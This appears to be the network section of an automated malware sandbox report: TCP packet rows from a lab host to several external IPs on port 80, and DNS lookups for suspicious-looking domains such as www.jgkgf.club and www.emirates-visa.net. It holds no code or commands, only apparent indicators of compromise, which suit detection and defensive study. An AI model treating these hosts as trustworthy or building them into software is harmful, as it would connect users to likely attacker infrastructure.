                                                                                                                                          Dec 9, 2024 08:50:02.375384092 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.383613110 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.383704901 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.383794069 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.391957998 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.392033100 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.392113924 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.504584074 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.504699945 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.504805088 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.507185936 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.507282019 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.507329941 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.512244940 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.512361050 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.512407064 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.517277956 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.517363071 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.517406940 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.522352934 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.522485018 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.522547007 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.527422905 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.527527094 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.527582884 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.532305956 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.532392979 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.532438993 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.537151098 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.537244081 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.537328959 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.541982889 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.542098045 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.542155981 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.546860933 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.546994925 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:02.547038078 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.562647104 CET4990880192.168.2.437.97.254.27
                                                                                                                                          Dec 9, 2024 08:50:02.682005882 CET804990837.97.254.27192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:07.967852116 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:08.087207079 CET8049928199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:08.087367058 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:08.102015972 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:08.221506119 CET8049928199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:09.327153921 CET8049928199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:09.327200890 CET8049928199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:09.327325106 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:09.613496065 CET4992880192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:10.632112026 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:10.751523972 CET8049934199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:10.751688957 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:10.765821934 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:10.885184050 CET8049934199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:11.985996962 CET8049934199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:11.986181021 CET8049934199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:11.986231089 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:12.269762039 CET4993480192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:13.288933992 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:13.408291101 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.408433914 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:13.423752069 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:13.543184996 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543204069 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543329000 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543339968 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543376923 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543479919 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543489933 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543498039 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:13.543555021 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:14.707390070 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:14.707551956 CET8049941199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:14.707601070 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:14.926124096 CET4994180192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:15.945203066 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:16.064570904 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:16.064697027 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:16.073834896 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:16.193584919 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:17.301317930 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:17.301347017 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:17.301605940 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:17.304318905 CET4994780192.168.2.4199.193.6.134
                                                                                                                                          Dec 9, 2024 08:50:17.424618006 CET8049947199.193.6.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:24.545427084 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:24.665786028 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:24.665957928 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:24.680794001 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:24.800259113 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.191726923 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.244307995 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.244324923 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.244421959 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.244463921 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.244477987 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.244491100 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.244503975 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.244514942 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.244540930 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.245135069 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.245153904 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.245166063 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.245171070 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.245194912 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.245208979 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.245582104 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.245615959 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:26.311093092 CET8049968149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:26.311331987 CET4996880192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:27.237919092 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:27.357260942 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:27.357439995 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:27.379339933 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:27.498549938 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.852627993 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.852652073 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.852751970 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:28.852920055 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.852931976 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.852942944 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.852967978 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:28.853535891 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.853548050 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.853558064 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.853585005 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:28.853607893 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:28.854012966 CET8049974149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:28.854063034 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:28.894876957 CET4997480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:29.921673059 CET4998480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:30.040954113 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.041038990 CET4998480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:30.058120012 CET4998480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:30.177593946 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.177612066 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.177668095 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.177685022 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.177757025 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.177812099 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.177892923 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.177931070 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:30.177942991 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:31.549318075 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:31.549503088 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:31.549622059 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:31.549633980 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:31.549674034 CET4998480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:31.549705982 CET4998480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:31.550123930 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:31.550134897 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:31.550147057 CET8049984149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:31.550172091 CET4998480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:31.566701889 CET4998480192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:32.585484028 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:32.704732895 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:32.704835892 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:32.714024067 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:32.833276987 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.231470108 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.231532097 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.231642962 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.231658936 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:34.231841087 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.231853962 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.231878996 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:34.232261896 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.232305050 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:34.232314110 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.232326031 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.232367039 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:34.233253002 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:34.233299971 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:34.236058950 CET4999080192.168.2.4149.104.34.134
                                                                                                                                          Dec 9, 2024 08:50:34.355268955 CET8049990149.104.34.134192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:39.638183117 CET5000780192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:39.757544994 CET8050007124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:39.757754087 CET5000780192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:39.770941973 CET5000780192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:39.890316963 CET8050007124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:41.285516977 CET5000780192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:41.405329943 CET8050007124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:41.405513048 CET5000780192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:42.304383993 CET5001380192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:42.470638037 CET8050013124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:42.470818996 CET5001380192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:42.484842062 CET5001380192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:42.604120016 CET8050013124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:43.988673925 CET5001380192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:44.108536005 CET8050013124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:44.110081911 CET5001380192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:45.007373095 CET5002280192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:45.126775980 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.126909018 CET5002280192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:45.140060902 CET5002280192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:45.259422064 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.259433985 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.259457111 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.259480953 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.259596109 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.259605885 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.259723902 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.259733915 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:45.259742022 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:46.645051956 CET5002280192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:46.764719009 CET8050022124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:46.764805079 CET5002280192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:47.704225063 CET5002980192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:47.823688030 CET8050029124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:47.823761940 CET5002980192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:47.837877035 CET5002980192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:47.957422018 CET8050029124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:49.794400930 CET8050029124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:49.794512033 CET8050029124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:49.794564009 CET5002980192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:49.797120094 CET5002980192.168.2.4124.6.61.130
                                                                                                                                          Dec 9, 2024 08:50:49.916441917 CET8050029124.6.61.130192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:55.304744005 CET5003280192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:55.424113989 CET80500323.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:55.424470901 CET5003280192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:55.438766003 CET5003280192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:55.558053017 CET80500323.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:56.542701960 CET80500323.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:56.542788982 CET80500323.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:56.542844057 CET5003280192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:56.941917896 CET5003280192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:57.960891008 CET5003380192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:58.080260992 CET80500333.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:58.082283020 CET5003380192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:58.097105026 CET5003380192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:58.216392040 CET80500333.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:59.177483082 CET80500333.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:59.177519083 CET80500333.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:59.177603960 CET5003380192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:50:59.598323107 CET5003380192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:51:00.617206097 CET5003480192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:51:00.736594915 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.736685991 CET5003480192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:51:00.752921104 CET5003480192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:51:00.872364044 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.872399092 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.872459888 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.872473001 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.872528076 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.872539997 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.872668028 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.872684002 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:00.872730017 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:01.966676950 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:02.019917011 CET5003480192.168.2.43.33.130.190
                                                                                                                                          Dec 9, 2024 08:51:02.060861111 CET80500343.33.130.190192.168.2.4
                                                                                                                                          Dec 9, 2024 08:51:02.060992002 CET5003480192.168.2.43.33.130.190
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 9, 2024 08:49:02.248861074 CET5935253192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:03.238420010 CET5935253192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:04.254245043 CET5935253192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:04.277450085 CET53593521.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:04.277486086 CET53593521.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:04.391515970 CET53593521.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:20.554636002 CET5767153192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:21.554110050 CET5767153192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:21.596012115 CET53576711.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:21.691171885 CET53576711.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:35.851188898 CET6208053192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:36.291888952 CET53620801.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:51.038526058 CET5615553192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:52.035389900 CET5615553192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:49:52.775511980 CET53561551.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:49:52.775554895 CET53561551.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:07.570122004 CET5129653192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:07.965257883 CET53512961.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:22.320162058 CET6069453192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:23.316977024 CET6069453192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:24.332417965 CET6069453192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:24.542695999 CET53606941.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:24.542712927 CET53606941.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:24.542721987 CET53606941.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:39.241904020 CET6323753192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:39.635741949 CET53632371.1.1.1192.168.2.4
                                                                                                                                          Dec 9, 2024 08:50:54.804786921 CET5935453192.168.2.41.1.1.1
                                                                                                                                          Dec 9, 2024 08:50:55.302105904 CET53593541.1.1.1192.168.2.4
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Dec 9, 2024 08:49:02.248861074 CET192.168.2.41.1.1.10x5fd4Standard query (0)www.jgkgf.clubA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:03.238420010 CET192.168.2.41.1.1.10x5fd4Standard query (0)www.jgkgf.clubA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:04.254245043 CET192.168.2.41.1.1.10x5fd4Standard query (0)www.jgkgf.clubA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:20.554636002 CET192.168.2.41.1.1.10x1f7aStandard query (0)www.hsa.worldA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:21.554110050 CET192.168.2.41.1.1.10x1f7aStandard query (0)www.hsa.worldA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:35.851188898 CET192.168.2.41.1.1.10xc99bStandard query (0)www.sssvip2.shopA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:51.038526058 CET192.168.2.41.1.1.10x98baStandard query (0)www.dutchdubliners.onlineA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:49:52.035389900 CET192.168.2.41.1.1.10x98baStandard query (0)www.dutchdubliners.onlineA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:07.570122004 CET192.168.2.41.1.1.10x9162Standard query (0)www.allstary.topA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:22.320162058 CET192.168.2.41.1.1.10x48b2Standard query (0)www.16v9tiu00r.inkA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:23.316977024 CET192.168.2.41.1.1.10x48b2Standard query (0)www.16v9tiu00r.inkA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:24.332417965 CET192.168.2.41.1.1.10x48b2Standard query (0)www.16v9tiu00r.inkA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:39.241904020 CET192.168.2.41.1.1.10x6cf9Standard query (0)www.comect.onlineA (IP address)IN (0x0001)false
                                                                                                                                          Dec 9, 2024 08:50:54.804786921 CET192.168.2.41.1.1.10x2ddeStandard query (0)www.emirates-visa.netA (IP address)IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Dec 9, 2024 08:49:04.277450085 CET1.1.1.1192.168.2.40x5fd4No error (0)www.jgkgf.clubccchhua889911.222tt.icuCNAME (Canonical name)IN (0x0001)false
